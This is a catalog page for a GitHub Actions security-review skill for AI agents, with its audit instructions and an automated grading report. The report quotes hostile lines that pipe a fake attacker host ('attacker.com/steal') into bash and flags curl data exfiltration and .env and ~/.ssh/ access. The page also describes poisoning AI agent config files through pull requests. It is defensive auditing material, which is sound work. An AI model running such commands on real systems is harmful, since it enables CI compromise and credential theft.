Catalog
getsentry/gha-security-review

getsentry

gha-security-review

GitHub Actions security review for workflow exploitation vulnerabilities. Use when asked to "review GitHub Actions", "audit workflows", "check CI security", "GHA security", "workflow security review", or review .github/workflows/ for pwn requests, expression injection, credential theft, and supply chain attacks. Exploitation-focused with concrete PoC scenarios.

NewUpdated Sep 30, 2026

GitHub Actions Security Review

Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.

This skill encodes attack patterns from real GitHub Actions exploits — not generic CI/CD theory.

Scope

Review the workflows provided (file, diff, or repo). Research the codebase as needed to trace complete attack paths before reporting.

Files to Review

  • .github/workflows/*.yml — all workflow definitions
  • action.yml / action.yaml — composite actions in the repo
  • .github/actions/*/action.yml — local reusable actions
  • Config files loaded by workflows: CLAUDE.md, AGENTS.md, Makefile, shell scripts under .github/

Out of Scope

  • Workflows in other repositories (only note the dependency)
  • GitHub App installation permissions (note if relevant)

Threat Model

Only report vulnerabilities exploitable by an external attacker — someone without write access to the repository. The attacker can open PRs from forks, create issues, and post comments. They cannot push to branches, trigger workflow_dispatch, or trigger manual workflows.

Do not flag vulnerabilities that require write access to exploit:

  • workflow_dispatch input injection — requires write access to trigger
  • Expression injection in push-only workflows on protected branches
  • workflow_call input injection where all callers are internal
  • Secrets in workflow_dispatch/schedule-only workflows

Confidence

Report only HIGH and MEDIUM confidence findings. Do not report theoretical issues.

Confidence Criteria Action
HIGH Traced the full attack path, confirmed exploitable Report with exploitation scenario and fix
MEDIUM Attack path partially confirmed, uncertain link Report as needs verification
LOW Theoretical or mitigated elsewhere Do not report

For each HIGH finding, provide all five elements:

  1. Entry point — How does the attacker get in? (fork PR, issue comment, branch name, etc.)
  2. Payload — What does the attacker send? (actual code/YAML/input)
  3. Execution mechanism — How does the payload run? (expression expansion, checkout + script, etc.)
  4. Impact — What does the attacker gain? (token theft, code execution, repo write access)
  5. PoC sketch — Concrete steps an attacker would follow

If you cannot construct all five, report as MEDIUM (needs verification).


Step 1: Classify Triggers and Load References

For each workflow, identify triggers and load the appropriate reference:

Trigger / Pattern Load Reference
pull_request_target references/pwn-request.md
issue_comment with command parsing references/comment-triggered-commands.md
${{ }} in run: blocks references/expression-injection.md
PATs / deploy keys / elevated credentials references/credential-escalation.md
Checkout PR code + config file loading references/ai-prompt-injection-via-ci.md
Third-party actions (especially unpinned) references/supply-chain.md
permissions: block or secrets usage references/permissions-and-secrets.md
Self-hosted runners, cache/artifact usage references/runner-infrastructure.md
Any confirmed finding references/real-world-attacks.md

Load references selectively — only what's relevant to the triggers found.

Step 2: Check for Vulnerability Classes

Check 1: Pwn Request

Does the workflow use pull_request_target AND check out fork code?

  • Look for actions/checkout with ref: pointing to PR head
  • Look for local actions (./.github/actions/) that would come from the fork
  • Check if any run: step executes code from the checked-out PR

Check 2: Expression Injection

Are ${{ }} expressions used inside run: blocks in externally-triggerable workflows?

  • Map every ${{ }} expression in every run: step
  • Confirm the value is attacker-controlled (PR title, branch name, comment body — not numeric IDs, SHAs, or repository names)
  • Confirm the expression is in a run: block, not if:, with:, or job-level env:

Check 3: Unauthorized Command Execution

Does an issue_comment-triggered workflow execute commands without authorization?

  • Is there an author_association check?
  • Can any GitHub user trigger the command?
  • Does the command handler also use injectable expressions?

Check 4: Credential Escalation

Are elevated credentials (PATs, deploy keys) accessible to untrusted code?

  • What's the blast radius of each secret?
  • Could a compromised workflow steal long-lived tokens?

Check 5: Config File Poisoning

Does the workflow load configuration from PR-supplied files?

  • AI agent instructions: CLAUDE.md, AGENTS.md, .cursorrules
  • Build configuration: Makefile, shell scripts

Check 6: Supply Chain

Are third-party actions securely pinned to full SHAs?

  • Pin third-party / external actions and reusable workflows only
  • Do not flag first-party actions/* or github/* on version tags
  • Do not flag same-repo / vendored (./.github/actions/...) as supply-chain pinning issues
  • Only report when the job has secrets, OIDC, write token, release, deploy, package, or signing power — unprivileged read-only CI is not a finding

Check 7: Permissions and Secrets

Are workflow permissions minimal? Are secrets properly scoped?

Check 8: Runner Infrastructure

Are self-hosted runners, caches, or artifacts used securely?

Safe Patterns (Do Not Flag)

Before reporting, check if the pattern is actually safe:

Pattern Why Safe
pull_request_target WITHOUT checkout of fork code Never executes attacker code
${{ github.event.pull_request.number }} in run: Numeric only — not injectable
${{ github.repository }} / github.repository_owner Repo owner controls this
${{ secrets.* }} Not an expression injection vector
${{ }} in if: conditions Evaluated by Actions runtime, not shell
${{ }} in with: inputs Passed as string parameters, not shell-evaluated
Third-party actions pinned to full SHA Immutable reference
First-party actions/* / github/* on version tags Outside third-party pinning policy — do not flag
Same-repo / vendored local actions Not third-party supply chain (review pwn-request separately)
pull_request trigger (not _target) Runs in fork context with read-only token
Any expression in workflow_dispatch/schedule/push to protected branches Requires write access — outside threat model

Key distinction: ${{ }} is dangerous in run: blocks (shell expansion) but safe in if:, with:, and env: at the job/step level (Actions runtime evaluation).

Step 3: Validate Before Reporting

Before including any finding, read the actual workflow YAML and trace the complete attack path:

  1. Read the full workflow — don't rely on grep output alone
  2. Trace the trigger — confirm the event and check if: conditions that gate execution
  3. Trace the expression/checkout — confirm it's in a run: block or actually references fork code
  4. Confirm attacker control — verify the value maps to something an external attacker sets
  5. Check existing mitigations — env var wrapping, author_association checks, restricted permissions, SHA pinning

If any link is broken, mark MEDIUM (needs verification) or drop the finding.

If no checks produced a finding, report zero findings. Do not invent issues.

Step 4: Report Findings

## GitHub Actions Security Review

### Findings

#### [GHA-001] [Title] (Severity: Critical/High/Medium)
- **Workflow**: `.github/workflows/release.yml:15`
- **Trigger**: `pull_request_target`
- **Confidence**: HIGH — confirmed through attack path tracing
- **Exploitation Scenario**:
  1. [Step-by-step attack]
- **Impact**: [What attacker gains]
- **Fix**: [Code that fixes the issue]

### Needs Verification
[MEDIUM confidence items with explanation of what to verify]

### Reviewed and Cleared
[Workflows reviewed and confirmed safe]

If no findings: "No exploitable vulnerabilities identified. All workflows reviewed and cleared."

Files10
10 files · 76.3 KB

Select a file to preview

Overall Score

82/100

Grade

B

Good

Grades are signals, not a certification. Always review a skill yourself before use.

Safety

85

Quality

82

Clarity

84

Completeness

76

Summary

This skill teaches agents to audit GitHub Actions workflows for exploitation vulnerabilities using real-world attack patterns from the HackerBot Claw campaign. It provides structured detection methodology (pwn requests, expression injection, credential escalation, supply chain) with reference guides covering eight attack vectors. The skill is read-only (uses Read, Grep, Glob, Bash for analysis) and scopes findings to externally-exploitable vulnerabilities with documented HIGH/MEDIUM confidence thresholds.

Static Analysis Findings

7 findings

Patterns detected by deterministic static analysis before AI scoring. Hover over any finding code for detailed information and remediation guidance.

Remote Code Execution
SEC-031Script Download

Dynamic script download for execution

references/supply-chain.mdcurl -sSfL https://example.com/install.sh
Data Exfiltration
SEC-040Outbound Data Transmission3x in 3 files

Outbound data transmission (curl POST/PUT with data)

references/pwn-request.mdcurl -d
references/runner-infrastructure.mdcurl -d
references/credential-escalation.mdcurl -d
Credential Exposure
SEC-020Direct .env File Access2x in 1 file

Direct .env file access

references/runner-infrastructure.md.env2x
SEC-022SSH/Credentials File AccessMax: B

SSH key or credentials file access

references/runner-infrastructure.md~/.ssh/
Command Injection
SEC-010Pipe-to-Shell12x in 5 filesMax: B

Pipe-to-shell pattern (curl/wget piped to sh/bash)

references/expression-injection.mdcurl -sSfL attacker.com/steal | bash
references/comment-triggered-commands.mdcurl -sSfL https://attacker.com/steal | bash
references/pwn-request.mdcurl -sSfL https://attacker.com/steal | bash3x
SEC-011Dynamic Shell Eval

Shell eval/exec of dynamic content

references/pwn-request.mdexec"
Network Access
SEC-060Outbound Network Request6x in 3 files

Outbound network request (curl/wget/fetch)

references/expression-injection.mdcurl https://2x
references/comment-triggered-commands.mdcurl https://
references/runner-infrastructure.mdcurl https://curl http://3x

Detected Capabilities

file readgrep pattern matchingbash script execution for analysisreference loading from structured files

Trigger Keywords

Phrases that agents use to match this skill to user intent.

gha security reviewworkflow exploitation auditgithub actions vulnerabilityexpression injection detectionpwn request checksupply chain pinningcredential escalation tracecomment command auth

Risk Signals

INFO

SEC-010 (pipe-to-shell: curl | bash) appears in reference documentation as attack examples

references/expression-injection.md, references/comment-triggered-commands.md, references/pwn-request.md, references/supply-chain.md, references/real-world-attacks.md
INFO

SEC-060 (outbound network requests: curl https://) documented in attack scenarios and real-world examples

references/expression-injection.md, references/comment-triggered-commands.md, references/pwn-request.md, references/runner-infrastructure.md, references/real-world-attacks.md
INFO

SEC-011 (shell eval/exec of dynamic content) referenced in pwn-request.md as attack vector

references/pwn-request.md
INFO

SEC-040 (curl POST with data) documented as exfiltration technique in attack references

references/pwn-request.md, references/runner-infrastructure.md, references/credential-escalation.md
INFO

SEC-020 (direct .env file access) and SEC-022 (SSH key access) documented in runner-infrastructure.md as attack indicators on self-hosted runners

references/runner-infrastructure.md
INFO

SEC-031 (dynamic script download for execution) documented in supply-chain.md as third-party action risk

references/supply-chain.md

Referenced Domains

External domains referenced in skill content, detected by static analysis.

169.254.169.254attacker.comcycode.comdocs.github.comexample.comgithub.bloggithub.comhackmoltrepeat.cominternal-api.corp.example.comrecv.hackmoltrepeat.comsecuritylab.github.comwww.apache.orgwww.aquasec.comwww.stepsecurity.io

Use Cases

  • Identify expression injection ($ {{ }}) in shell run: blocks that can be exploited via PR titles, branch names, or filenames
  • Detect pwn request vulnerabilities where pull_request_target workflows checkout and execute fork code with elevated permissions
  • Audit issue_comment workflows for missing author_association checks that allow unauthorized command execution
  • Find unpinned third-party GitHub Actions that pose supply-chain risks in privileged workflows
  • Trace complete attack paths from entry point (fork PR, comment) through payload execution to impact (token theft, repo compromise)
  • Review GitHub Actions credential scoping to prevent secrets exposure to untrusted code
  • Detect config file poisoning (CLAUDE.md, AGENTS.md) attacks on AI-driven workflows
  • Identify self-hosted runner misuse with fork code execution or persistent credential theft
  • Assess cache and artifact poisoning across workflow boundaries

Quality Notes

  • Skill is well-structured with clear threat model (external attackers only, excluding write-access scenarios)
  • Strong emphasis on HIGH/MEDIUM confidence thresholds prevents over-reporting of theoretical issues
  • Explicit 'Safe Patterns' section prevents false positives (e.g., numeric-only expressions, if: conditions, workflow_dispatch inputs)
  • Eight reference files provide attack-specific detection patterns, real-world examples, and fixes — demonstrates depth
  • Real-world attack timeline (HackerBot Claw) with documented outcomes calibrates severity and validates findings
  • Comprehensive five-element exploitation scenario template ensures completeness (entry, payload, mechanism, impact, PoC)
  • Clear distinction between first-party (actions/*, github/*) and third-party action pinning policies reduces scope creep
  • Missing: no guidance on handling false positives or ambiguous patterns (e.g., what if source of expressions unclear after tracing)
  • Missing: no discussion of mitigation detection (e.g., how to score if mitigations exist but are imperfect)
  • Step 3 validation instructions are strong but lack concrete examples of when to downgrade HIGH→MEDIUM or drop findings
Model: claude-haiku-4-5-20251001Analyzed: Sep 30, 2026

Reviews

Add this skill to your library to leave a review.

No reviews yet

Be the first to share your experience.

Version History

  1. v2.1

    Content updated

    ✦ AIReferences documentation updated in runner infrastructure guide.

    2026-09-30

    LATEST
  2. v2.0

    Contract changed: allowed-tools

    ✦ AIAllowed-tools contract unchanged

    tool access2026-09-29

    View This Version
  3. v1.1

    Content updated

    ✦ AIRefines third-party action pinning check to exclude first-party and vendored actions and adds privilege gate for findings.

    2026-09-09

    View This Version
  4. v1.0

    2026-07-11

    View This VersionInitial version

Use getsentry/gha-security-review in your dev environment

Command Palette

Search for a command to run...